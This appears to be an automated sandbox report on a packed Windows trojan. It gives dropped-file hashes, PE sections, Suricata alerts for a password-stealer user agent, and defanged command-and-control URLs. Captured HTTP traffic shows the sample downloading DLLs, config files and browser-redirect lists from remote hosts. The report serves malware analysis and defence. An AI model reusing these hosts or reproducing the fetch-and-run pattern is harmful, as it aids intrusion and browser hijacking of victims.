[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 72 F7 B1 07 EF 3D C4 60 2B 2F D5 80 99 C1 E7"

Dropped PE files

MD5 File path
cf1cdb854f655fd69597335e96de6792 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4.tmp
75434d6228364bfd1102c97edd346485 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA27678.tmp
1fad2419bc27270ef354b4cd18ea29fe c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA6871.tmp
73e40295ab0e0c740b114b9251042b87 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA8273.tmp
bd79d4230e8cf291fefc260a1b1030c0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBC263.TMP
d4424c25155d688f00f89bfa6d2bc534 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBIC753.TMP
9484c04258830aa3c2f2a70eb041414c c:\WINDOWS\system32\mswinsck.ocx

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 118784 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 122880 118784 115712 5.53848 b72c9776fd3a7b7dc02aae29753eda36
.rsrc 241664 4096 512 2.49332 5d5a0a9007054812fac418762132b2f3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
e4296b98643be0faa0f61186d64462cb

URLs

URL IP
hxxp://1stcncloudsave.cloud.ourwebpic.com/file.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/yswm/taian.ini
hxxp://1stcncloudsave.cloud.ourwebpic.com/osm.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/ip.asp
hxxp://1stcncloudc.cloud.ourwebpic.com/mactj.asp?mac=0050563B0E71&uname=taian
hxxp://1stcncloudc.cloud.ourwebpic.com/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar
hxxp://1stcncloudsave.cloud.ourwebpic.com/newcor.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/serList.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/pubjc.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com//send/safeen.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/exitpop.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/yxjk/yxjpq.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/eb.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/yxjk/jzyxj.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/tfgg.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/homepro.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/prosafe.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/addjs/jslist.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jzjc/jzjc.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jzjc/jzurl.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/newDomain.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/urlRemote.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/yswm/Spid_jc_id.ini
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jwico.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd_enlc.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd.txt
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd_2345title_en.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/icdata.dll
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/ico2safe.txt
hxxp://1stcncloudsave.cloud.ourwebpic.com/send/ico2.txt
hxxp://yxtt.v138.net/send/prosafe.txt 115.231.84.95
hxxp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian 118.180.9.137
hxxp://yxtt.v138.net/send/tfgg.txt 115.231.84.95
hxxp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar 118.180.9.137
hxxp://www.topyouxi.net/homepro.txt 218.92.226.46
hxxp://user.yswm.net/yswm/Spid_jc_id.ini 218.92.226.45
hxxp://yxtt.v138.net/send/addjs/jslist.txt 115.231.84.95
hxxp://down.369k.net/icdata.dll 218.92.226.45
hxxp://yxtt.v138.net/send/eb.txt 115.231.84.95
hxxp://123.1313k.net/send/InsertWnd_enlc.dll 218.92.226.45
hxxp://yxtt.v138.net/send/InsertWnd.txt 115.231.84.95
hxxp://yxtt.v138.net/send/yxjk/yxjpq.txt 115.231.84.95
hxxp://123.1313k.net//send/safeen.txt 218.92.226.45
hxxp://www.topyouxi.net/urlRemote.txt 218.92.226.46
hxxp://yxtt.v138.net/send/jwico.txt 115.231.84.95
hxxp://yxtt.v138.net/send/jzjc/jzjc.txt 115.231.84.95
hxxp://yxtt.yswm.net/send/ico2.txt 115.231.84.94
hxxp://user.yswm.net/yswm/taian.ini 218.92.226.45
hxxp://yxtt.v138.net/send/pubjc.txt 115.231.84.95
hxxp://www.pc918.net/file.txt 115.231.84.94
hxxp://yxtt.v138.net/send/exitpop.txt 115.231.84.95
hxxp://yxtt.yswm.net/send/ico2safe.txt 115.231.84.94
hxxp://yxtt.v138.net/send/jzjc/jzurl.txt 115.231.84.95
hxxp://yxtt.v138.net/send/yxjk/jzyxj.txt 115.231.84.95
hxxp://1212.ip138.com/ic.asp 119.167.164.43
hxxp://yxtt.v138.net/send/newDomain.txt 115.231.84.95
hxxp://www.topyouxi.net/newcor.dll 218.92.226.46
hxxp://www.topyouxi.net/osm.dll 218.92.226.46
hxxp://www.yswm.net/ip.asp 115.231.84.95
hxxp://yxtt.v138.net/send/serList.txt 115.231.84.95
hxxp://yxtt.v138.net/send/InsertWnd_2345title_en.dll 115.231.84.95


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE suspicious User-Agent (vb wininet)
SURICATA HTTP invalid content length field in response
ET TROJAN Generic Password Stealer User Agent Detected (RookIE)

Traffic

GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1
User-Agent: vb   wininet
Host: mactj.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD; path=/
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)
Connection: keep-alive
err!HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:38 GMT..Server: Micr
osoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 4..Content-Type:
text/html..Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD;
path=/..Cache-Control: private..X-Cache: MISS from cache.51cdn.com..X
-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)..Connection: keep-ali
ve..err!..


GET //send/safeen.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.1313k.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 08:57:04 GMT
Content-Length: 2942
Content-Type: text/plain
Last-Modified: Sat, 24 Sep 2016 02:08:11 GMT
Accept-Ranges: bytes
ETag: "9e7c6380816d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:3 (Cdn Cache Server V2.0), 1.1 jsycdx41:6 (Cdn Cache Server V2.0)
Connection: keep-alive
QW...NONNOL=.....MR]^=.............Q\.=.NIHS...!..ATA.....S...=..W..s@
DILHHNDD=...FV\..WHENKJ=....U]].WDLJJIE=....U]].WHEOKH=.....^\TWHEOKE=
......_U.HENLK=.......V..EOKJ=LMMLMO..\r.LMMEKS..=DQW[..s..NOMNS......
.\V.R..S...=..ZV...JMKMWHE..S...qJF....S...=.....Q]=...S=..."...TJsR..
.B=R...N".P[W.S...R...=...UG....R......!..XVFS...R........TrD..S.....S
...LAr.D...S...=S...^AUS...=SDOM..L.^_s.....S....."MRZR.....S...R...EW
].=S......S....A....."...=HSSRVS^.S...=......Q...N=SLJNS...!..A.@..@LM
H=OKISWS.r.OLODDS...=...FK....=OLJJJL!PU...HK=....SL...PC.P..=SMJDLDS.
..q..OON...=.SLPQP.QP=ONOON..=DXWV...S...=DK..S....r.......S...!..P\B.
S..=S..S...#KZZ..ES..=.......Q\.=.....S...M.X\ZRD.R.....S...q.J.KMEMS.
..=....YV...S...=.@PVR..........=NLPTLX\W..S...=...OW[......R.."...!..
\[email protected]...=..._Q[..........O..\rG.SHL.....S...q^\.....*......#_X.ES.
..=.....L.^HV.....S...=...I[].S.....S...".XS].HNNS....=XRT...=........
S...q.T...S..=....V[..P..=.OMLHMHS[.ZY\=..JJMI=S...MR\sS....S...=...PF
Z..R...R.......r.......S...!L.T_R..S...=.....IWWZ.........S...qSB..W..
...S.."TWUR..S...=..DX[MR]^=DMNKMJJO=XS[...IO=DLKNEHOW"Z...KIHJ=..OMST
ZU.^R=.....SMJDP[MR]^=BJLLMNPMKQR#...LMNPMDDD=BVSS..sSON...S...N..\^P.
..ROLE=....MBEY..S...=...O..PTVOES...R......]rC...S.....S....TA...=S..
....L.^_.....=.......MR]^=....S.....L.^_s....WDMDMET"._@DWDMDLOI=.....
Er.MDOLE=S......G.P..=.......\PR.r.MDOEJ=.....L.TQR.S...=DLNHQZ#FEDS..
S...=...L.XB....=S........^\VS...=LONS....D.P..RBJLMEIPVQT.r.H..S...=.
....C..WDIDNLJHL=XRZ...=..........HMH]F.....S...=...YS\....WS.....

<<< skipped >>>

GET /send/InsertWnd_enlc.dll HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.1313k.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 22:35:39 GMT
Content-Length: 124416
Content-Type: application/x-msdownload
Last-Modified: Fri, 08 Jul 2016 12:31:29 GMT
Accept-Ranges: bytes
ETag: "5828f9a614d9d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:5 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}.}}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}aO...Z....
.........!.G.....n.......#.......#.........I...........m=?.P...r#j....
.m=%.[...r#l.....0.RZZ...}}}}}}}abc123}}}-8}}1|~a..Ne3}}}}}}}.}.@ib:23
.|}}m}}}}yaR.423my}}.x}}}}qbs123.}}x}|}}}}agc023}}}}}{}}m}abc121}=|}}m
}}m}abc!23m}}}}}}m}}a~.42[}}}..x}=.}ab.42.|}}}}}}}}}abc123}}}..x}e}}ab
c123}}}}}}}}}}abc123}}}}}}}}}}ar.42{}}}}}}}}}}abc123}}}}}}}}}}abc123}}
}}}}}}}}a73i.3}}}}}y}}m}abc123y}}}}}}}}}abc12.}}.(-%L}}}ab.023my}}.|}}
y}abc123}}}}}}}=}}.L.B@P}}}}m}}}.xabe123.|}}}}}}}}abc12s}}.}}}}}}}abc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw.....J....42..|}}'x}[q}!x`1.............,...
..p...~QW..F.!ZxiQ.{x.$Z..GA..i....z3. ......`..f.T.B..x..pj>P..zh.
..jX.Q......c.)g;...........'C......;7.$.&.....Q.l...*q [email protected]
...FVIr........=.....j....y...Zw..y..i..Y.........t...".........t..M..
....6..A..<.v.}..{[email protected]../..m..L...a.j..H....8P.NR...n
..X........$T.Jx. $..C.L.O..,~L.....T`....jv5=2..........JZ.*WU ..R0..
.C.>w.!Y...v.9..sg..{. ..:_..A..c.....)*...Sz...CEi..\yMu....e..)..
5...D...C..z....G..J]....oi..3.k.h-....>..V..."..t.P'.~.`..Y.R.

<<< skipped >>>

GET /file.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.pc918.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 07:55:10 GMT
Content-Length: 199
Content-Type: text/plain
Last-Modified: Fri, 20 May 2016 16:38:12 GMT
Accept-Ranges: bytes
ETag: "a86150b6b2d11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[Basic]..Url1=hXXp://VVV.topyouxi.net/osm.dll..Url2=hXXp://down.v718.c
om/osm.dll..md5=65F7B70B548389ADE039D1804C893694..Filepath=..dll=..Exe
Name=..config=hXXp://user.yswm.net/yswm/..Jm=1..time=6000..HTTP/1.1 20
0 OK..Date: Wed, 03 Aug 2016 07:55:10 GMT..Content-Length: 199..Conten
t-Type: text/plain..Last-Modified: Fri, 20 May 2016 16:38:12 GMT..Acce
pt-Ranges: bytes..ETag: "a86150b6b2d11:a470"..Server: Microsoft-IIS/6.
0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X
-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cach
e Server V2.0)..Connection: keep-alive..[Basic]..Url1=hXXp://VVV.topyo
uxi.net/osm.dll..Url2=hXXp://down.v718.com/osm.dll..md5=65F7B70B548389
ADE039D1804C893694..Filepath=..dll=..ExeName=..config=hXXp://user.yswm
.net/yswm/..Jm=1..time=6000....


GET /yswm/taian.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.yswm.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 12:29:07 GMT
Content-Length: 503
Content-Type: application/vnd.rn
Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT
Accept-Ranges: bytes
ETag: "3679b94fba96d11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sg
tp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=..
..[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sg
tp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=new
lock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@
lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@q
qclose@icojc@addjc@tcclose@[email protected]=..prisafe=..HTT
P/1.1 200 OK..Date: Sat, 24 Sep 2016 12:29:07 GMT..Content-Length: 503
..Content-Type: application/vnd.rn..Last-Modified: Fri, 15 Apr 2016 01
:58:31 GMT..Accept-Ranges: bytes..ETag: "3679b94fba96d11:a652"..Server
: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from
cache.51cdn.com..X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jin
h94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..[UnionID]..Url=
..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpus
h=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=
..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpus
h=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....
[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclos
e@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@ad
djc@tcclose@[email protected]=..prisafe=..
....

<<< skipped >>>

GET /yswm/Spid_jc_id.ini HTTP/1.1

User-Agent: RookIE/1.0
Host: user.yswm.net


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 05:12:33 GMT
Content-Length: 6
Content-Type: application/vnd.rn
Last-Modified: Mon, 12 Oct 2015 02:30:03 GMT
Accept-Ranges: bytes
ETag: "4c19d3e6954d11:a3bc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
9904..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 05:12:33 GMT..Content-Le
ngth: 6..Content-Type: application/vnd.rn..Last-Modified: Mon, 12 Oct
2015 02:30:03 GMT..Accept-Ranges: bytes..ETag: "4c19d3e6954d11:a3bc"..
Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT
from cache.51cdn.com..X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0),
1.1 jinh94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..9904...
.


GET /icdata.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.369k.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 01:47:22 GMT
Content-Length: 136192
Content-Type: application/x-msdownload
Last-Modified: Wed, 21 Sep 2016 01:45:25 GMT
Accept-Ranges: bytes
ETag: "dc41e7d2a913d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:1 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}|}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a......:..
.:...:.......:.......:...w. .:.......:.......:.....4.:..1....:../....:
..1....:.......:..1....:./.....:.bc123}}}}}}}}}}a2&12.|~}...*}}}abc12.
}.\v|v}}m.abs123..}..y}}..ab.523}}m}m}}}.}agc023}}}x}|}}}}ab.523m}}}}}
}.}=`bc!23m}}}}m}}m}abc12#}}}..y}.}}ab.52K.}}}.y}}~}abc123}}}}}}}}}}af
.52 }}}}}}}}}}abc123}}}}}}}}}}abc123}}}..y}5}}abc123}}}}}}}}}}abc123}}
}}}}}}}}abc123}}}(-%M}}}ab.323m}}}}}}}y}abc123}}}}}}}.}}.73i.3}}}}m.}}
..abk323y}}}}}}}}}abc12s}}.S....}}abs123.y}}u}}}q.abc123}}}}}}}=}}.bc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw..&<..8...52..|}}'y}[q}.x`1..........U..B
...'.w.P.........L..i., .......l.J..U.[...&.c8.R.'..K..R.<.........
Q.....B.....U{_. ..X..<..=.=4...z...R....A`P....uh.....8....-.,#.l.
.)..,.E.l.S.,..........8Xoh..0.[.|...e%}.m<.boy..... .....\Cd.cI]#.
.........F...z6.!I....8.)."...BD1.(.....zJ....?V.....u..T.....K....l..
'..I.x.p...!.......Y....)...$s_?........u(......E0v 0.1.v..<.|.....
..%$......p.._.2i.8........!.:..8C.dj ......:..3..H.2..........>.S.
..h#|....%.....5.Z......;.F......0.y.4 .I..D.o.(B.3<^\.=...z.u.

<<< skipped >>>

GET /send/ico2safe.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.yswm.net


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 02:57:12 GMT
Content-Length: 58
Content-Type: text/plain
Last-Modified: Wed, 21 Sep 2016 02:27:29 GMT
Accept-Ranges: bytes
ETag: "988b87b3af13d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:0 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)
Connection: keep-alive
@.....@hnrw*-......-@lhm*[email protected]...@hnrw*-........-....



GET /send/ico2.txt HTTP/1.1

User-Agent: RookIE/1.0
Host: yxtt.yswm.net


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:15:23 GMT
Content-Length: 11304
Content-Type: text/plain
Last-Modified: Wed, 21 Sep 2016 03:13:30 GMT
Accept-Ranges: bytes
ETag: "d0bbba20b613d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:4 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)
Connection: keep-alive
........^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3..........^hXXp://VVV.
yaojyw.net/hnyx/yxsix.html^3............^hXXp://VVV.yaojyw.net/hnyx/yx
four.html^3............^hXXp://VVV.yaojyw.net/hnyx/yxfour.html^3......
^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3........^hXXp://VVV.yaojyw.net
/hnyx/yxfour.html^3............1.76....^hXXp://VVV.168wm.net/zbjc2/ind
ex.htm^3..........^hXXp://VVV.168wm.net/zbjc1/index.htm^3........^http
://VVV.168wm.net/zbjc1/index.htm^3..........^hXXp://VVV.168wm.net/zbjc
1/index.htm^3........-........3D^hXXp://VVV.168wm.net/zbjc1/index.htm^
3......88..^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://ww
w.168wm.net/zbjc1/index.htm^3......10000..^hXXp://VVV.168wm.net/zbjc2/
index.htm^3..............^hXXp://VVV.168wm.net/zbjc2/index.htm^3......
................^hXXp://VVV.168wm.net/zbjc1/index.htm^3..........^http
://VVV.168wm.net/zbjc1/index.htm^3..........^hXXp://VVV.168wm.net/zbjc
1/index.htm^3....boss..SS......^hXXp://VVV.168wm.net/zbjc2/index.htm^3
....................^hXXp://VVV.168wm.net/zbjc2/index.htm^3...........
. ..........^hXXp://VVV.168wm.net/zbjc2/index.htm^3.......... ......
....^hXXp://VVV.168wm.net/zbjc2/index.htm^3..xy........^hXXp://VVV.168
wm.net/zbjc2/index.htm^3................^hXXp://VVV.168wm.net/zbjc2/in
dex.htm^3............999......^hXXp://VVV.168wm.net/zbjc2/index.htm^3.
.............^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://
VVV.168wm.net/zbjc2/index.htm^3....................^hXXp://VVV.168wm.n
et/zbjc2/index.htm^3........100%....^hXXp://VVV.168wm.net/zbjc2/in

<<< skipped >>>

GET /send/serList.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:03:22 GMT
Content-Length: 1521
Content-Type: text/plain
Last-Modified: Wed, 03 Aug 2016 02:32:29 GMT
Accept-Ranges: bytes
ETag: "58decd472fedd11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:3 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..................@................@........ ..........@..............
......@2014............@............ - @.................... - @120.27
[email protected]..@....................@3D........@............@......
....................@....................@............@...............
.....OK........@............ @......................@.................
.....@[email protected]........@........
................ @....................@....................@..........
........ -@...................... -@................................@.
............. -@................@..................................@..
................@[email protected][email protected].
[email protected][email protected]............@.......
[email protected]@................@................
[email protected][email protected]....................
[email protected]........................@....................
....@[email protected][email protected]...........
[email protected]........ ............-............-........ @3.....
.-................-........@[email protected]..........
..........@....................@................@.....................
...@..........................@..................................@....
[email protected]........@........ - ........@
........ ........-........@[email protected]/
page@.................. - 7..26....................
....

<<< skipped >>>

GET /send/pubjc.txt HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 19:05:00 GMT
Content-Length: 147285
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2016 07:01:44 GMT
Accept-Ranges: bytes
ETag: "f4cbe586815d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:10 (Cdn Cache Server V2.0), 1.1 jinh95:5 (Cdn Cache Server V2.0)
Connection: keep-alive
.2345mini.com/sogou123/371325^2^hXXp://VVV.v136.net/sy/^^60^^...2345.c
om/?kz00966p^2^hXXp://VVV.v136.net/sy/^^60^^..2kiss.minibu8.com^2^http
://VVV.v136.net/url^^60^^...w1258.com:^2^hXXp://VVV.v136.net/url^^60^^
..j.88817973.cn^2^hXXp://VVV.v136.net/url^^60^^...koolmy.com^2^hXXp://
VVV.v136.net/qp^^60^^...xh0222.com^2^hXXp://VVV.v136.net/qp^^60^^...vi
p45088.com^2^hXXp://VVV.v136.net/qp^^60^^...qvodik.com^2^hXXp://VVV.v1
36.net/qp^^60^^..80.kmay89.com^2^hXXp://VVV.v136.net/qp^^60^^...qy223.
com^2^hXXp://VVV.v136.net/qp^^60^^...67365c.com^2^hXXp://VVV.v136.net/
qp^^60^^...hlfvip2.com^2^hXXp://VVV.v136.net/qp^^60^^...g678929.com^2^
hXXp://VVV.v136.net/qp^^60^^...jkgame1705.com^2^hXXp://VVV.v136.net/qp
^^60^^...2345.com/?kb9999^2^hXXp://VVV.v136.net/sy/^^60^^...2345.com/?
ka00001p^2^hXXp://VVV.v136.net/sy/^^60^^...hao123.com/?tn=95235957_hao
_pg^2^hXXp://VVV.v136.net/sy2/^^60^^..vv.85yi.com^2^hXXp://VVV.v136.ne
t/url^^60^^..aaa.cn8886.com^2^hXXp://VVV.v136.net/url^^60^^..bmw.37gf.
com^2^hXXp://VVV.v136.net/url^^60^^..pm.5zdn.com/31^2^hXXp://VVV.v136.
net/url^^60^^..pc.zc-wan.com^2^hXXp://VVV.v136.net/qp^^60^^..pc.player
zc.com^2^hXXp://VVV.v136.net/qp^^60^^...08098.com^2^hXXp://VVV.v136.ne
t/qp^^60^^...70888n.com^2^hXXp://VVV.v136.net/qp^^60^^...yz900.com^2^h
ttp://VVV.v136.net/qp^^60^^..2345n.sogoulp.com/index16781983_1.html^2^
hXXp://VVV.v136.net/sy/^^60^^..123.sogoulp.com/index16782843_1.html^2^
hXXp://VVV.v136.net/sy/^^60^^...2345.com/?kz00232p^2^hXXp://VVV.v136.n
et/sy/^^60^^...2345.com/?kz00850p^2^hXXp://VVV.v136.net/sy/^^60^^.

